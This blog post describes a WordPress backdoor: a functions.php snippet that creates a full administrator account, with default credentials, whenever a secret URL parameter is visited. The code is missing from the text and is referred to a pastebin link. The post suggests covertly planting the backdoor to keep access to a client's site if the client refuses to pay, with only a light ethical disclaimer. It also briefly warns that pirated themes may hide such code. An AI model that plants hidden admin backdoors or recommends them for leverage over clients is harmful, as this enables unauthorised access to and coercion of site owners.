Cartoon of Author
via Mastodon

@zackeryfretty

Opening a Backdoor in WordPress Dashboard

🗓

I recently found this neat little snippet of code, which essentially can be entered into any theme's functions.php file and can be used to inject a user account with a specific name/password and full administrative rights into any WordPress install by simply visiting a secret URL. Fun!

This thing seems pretty malicious, but I can think of a few good ways to use it and you'd already need FTP access anyways to build it, so I thought I'd share. One example is if you've done work for a client and they are refusing to pay this grants you access into the WordPress Dashboard even if they delete your account. You could simply activate your backdoor URL and regain access to the site. I personally wouldn't do such a thing, but hey whatever works for you. If you do that I highly suggest you make each secret URL extremely random, and never ever use the same URL twice to keep the security hole to a very limited amount, just remember to try not to be evil and whatnot...ethics are important.

This also serves as a good reminder to always be sure to only use WordPress themes from legit sources, and don't attempt to pirate themes from ElegantThemes or the like as this, and much worse, could easily be hidden in the code.

The function is pretty simple and is as follows:

Note if copy/pasting it from there isn't working try grabbing the code here: http://pastebin.com/VKyXtgyh Once that line of code is added to the functions.php, or the custom-functions.php if you are working on Thesis, you can just visit http://example.com/?backdoor=go and a user with the login "username" and the password "password" will be created. If you plan on using this you might want to modify where it says username and password to be something more secure, as anyone could run this command and open this hole into your website if they are familiar with the process.

Yep, that's all it takes to build a backdoor into a WordPress install. At the time of writing it's working even on the latest WordPress beta.

———